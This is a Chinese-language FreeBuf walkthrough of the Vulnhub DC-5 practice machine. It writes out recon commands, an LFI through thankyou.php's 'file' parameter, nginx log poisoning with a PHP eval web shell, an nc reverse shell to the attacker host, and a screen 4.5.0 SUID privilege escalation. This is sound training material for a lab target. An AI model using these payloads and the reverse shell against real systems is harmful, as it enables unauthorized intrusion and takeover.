freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Vulnhub--DC-5
CNjuzi 2022-12-20 23:39:34 119878
所属地 宁夏

Vulnhub--DC-5

一,部署方法

  1. 在官网上下载zip压缩包
  2. 下载到本地上解压缩后使用虚拟机导入.ova后缀的文件(在过程中出现问题不用理睬,点击重试即可)
  3. 配置网络,本人设置的是nat模式,这个看个人需求
  4. 打开靶机即可

二,靶机地址和描述

  1. 下载地址

https://download.vulnhub.com/dc/DC-5.zip

  1. 靶机描述

1671550468_63a1d6047d067da4de765.png!small?1671550468818

三,测试

1. 信息收集

使用

arp-scan -l

扫描网段,查找靶机地址

1671550479_63a1d60fd3ac2ee903f49.png!small?1671550480135

扫描出来149为靶机地址,148为攻击机地址

使用

nmap -A -T4 -p- 192.168.237.149

扫描149的端口开放情况

1671550483_63a1d613a8ec90550f2fa.png!small?1671550483986

发现开放80端口—web服务。111端口和60046端口。

使用目录扫描工具进行扫描

dirb http://192.168.237.149/

1671550499_63a1d623ddec682d75ca4.png!small?1671550500219

毫无任何有用的信息

尝试访问靶机开放的80端口

1671550503_63a1d627763967bc6cf4b.png!small?1671550504197

这里点击所有的功能点,发现在contact功能下有点小东西~

1671550510_63a1d62e8a5b241c17c1b.png!small?1671550510944

有一个留言功能,进行填写提交

1671550514_63a1d6324b41f3f2fc228.png!small?1671550514488

提交后,发现有地方改变

1671550519_63a1d63771163c174f249.png!small?1671550519653

查看源代码

1671550523_63a1d63b39df69e24e482.png!small?1671550523459

发现可能存在footer.php的页面,访问查看

1671550526_63a1d63ed50724d77fbc2.png!small?1671550527063

这里发现:

在thankyou.php的页面下包含了一个footer.php页面,每次刷新thankyou.php的页面后,页脚中的footer.php也会随之改变,这里怀疑存在文件包含漏洞

抓包爆破查看文件包含漏洞的参数

1671550531_63a1d6438240d3b335fdd.png!small?1671550531718

发现是file参数。

尝试进行读取系统中的/etc/passwd,查看是否能读取到信息

1671550568_63a1d668425a7ca6e1b63.png!small?1671550568560

成功读取到/etc/passwd的信息

2. 反弹shell

再次查看页面,使用wappalyzer,发现这里的中间件是nginx 1.6.2

1671550572_63a1d66cf0d9f6eda4849.png!small?1671550573307

nginx会记录我们的访问日志,这里可以在请求中写入一句话木马,然后读取日志文件,进行getshell

让我们查看Nginx的配置文件

1671550582_63a1d676a17ae3dd606d8.png!small?1671550582961

发现日志文件的位置,访问/var/log/nginx/access.log

1671550586_63a1d67a88ac06be40a1a.png!small?1671550586944

发现可以构造firstname=......一句话木马进行保存到日志中

构造参数

firstname=<?php @eval($_POST[‘HK’]); ?>

1671550593_63a1d68136d85454b0ec1.png!small?1671550593680

访问/thankyou.php?file=/var/log/nginx/access.log

使用蚁剑进行链接

1671550598_63a1d686501f6fff74bde.png!small?1671550598683

成功进行链接

进入虚拟终端进行反弹shell

使用kali攻击机进行监听

nc -lvvp 4444

1671550617_63a1d6991b32673e66ff9.png!small?1671550617320

使用蚁剑进行反弹shell

nc 192.168.237.148 4444 -e /bin/bash

1671550621_63a1d69d29248e2e76942.png!small?1671550621403

成功反弹shell

使用命令进行交互式界面

python -c “import pty;pty.spawn(‘/bin/bash’)”

1671550633_63a1d6a983d2fbdc6d3d2.png!small?1671550633740

查看当前用户

whoami

1671550638_63a1d6ae93ce71ef4a846.png!small?1671550638809

为最低权限,尝试提权

3. 提权

首先查找具有SUID的命令

find / -user root -perm -4000 -print 2>/dev/null

1671550647_63a1d6b7450f24e84d895.png!small?1671550647613

发现screen-4.5.0有大嫌疑,尝试使用kali内自带的漏洞库进行检索

searchsploit screen 4.5.0

1671550656_63a1d6c0ccbe566a031c9.png!small?1671550657507

使用

cat /usr/share/exploitdb/exploits/linux/local/41154.sh

1671550662_63a1d6c6bf28178ff714d.png!small?1671550663136

根据文件中的提示进行操作。

1671550666_63a1d6caca2901f8f226a.png!small?1671550667128

将上面这部分复制粘贴到libhax.c中

1671550669_63a1d6cde875b1e6ee2d7.png!small?1671550670419

将下面的一段代码保存到rootshell.c中

1671550674_63a1d6d22ee425c9c052f.png!small?1671550674434

1671550677_63a1d6d57b3b8c54c70b2.png!small?1671550677788

将剩下的代码保存到a.sh中

1671550682_63a1d6da30bc2bb8ad510.png!small?1671550682468

1671550684_63a1d6dcd58218235fb24.png!small?1671550685186

进行编译libhax.c和rootshell.c文件

gcc -fPIC -shared -ldl -o libhax.so libhax.c

1671550694_63a1d6e66d49e908826a4.png!small?1671550694666

gcc -o rootshell rootshell.c

1671550698_63a1d6ea1551e1733320a.png!small?1671550698416

将编译好的rootshell libhax.so和a.sh上传到靶机的/tmp目录下,使用蚁剑进行上传

1671550702_63a1d6ee3aea533980df3.png!small?1671550702411

继续在kali中的监听窗口进行输入命令

cd /tmp

chmod +x a.sh

./a.sh

1671550709_63a1d6f51869f42c715df.png!small?1671550709302

提权成功

1671550712_63a1d6f84d313beb34723.png!small?1671550712470

进入/root目录下,查看flag

1671550716_63a1d6fcb1c2d4bfac1ea.png!small?1671550717418


四,总结

  1. 文件包含漏洞
  2. 一句话木马
  3. 蚁剑getshell
  4. Screen 4.5.0提权


# 漏洞 # 渗透测试 # web安全 # 网络安全技术 # VulnHub
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 CNjuzi 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
vulnhub实战打靶系列
CNjuzi LV.5
欢迎关注公众号:HK安全小屋。公众号内定期更新网络安全方面的知识和心得!!
  • 18 文章数
  • 7 关注者
InfoSecWarrior CTF 2020: 01
2023-07-16
LAMPSecurity: CTF5
2023-03-28
LAMPSecurity: CTF4
2023-03-22
文章目录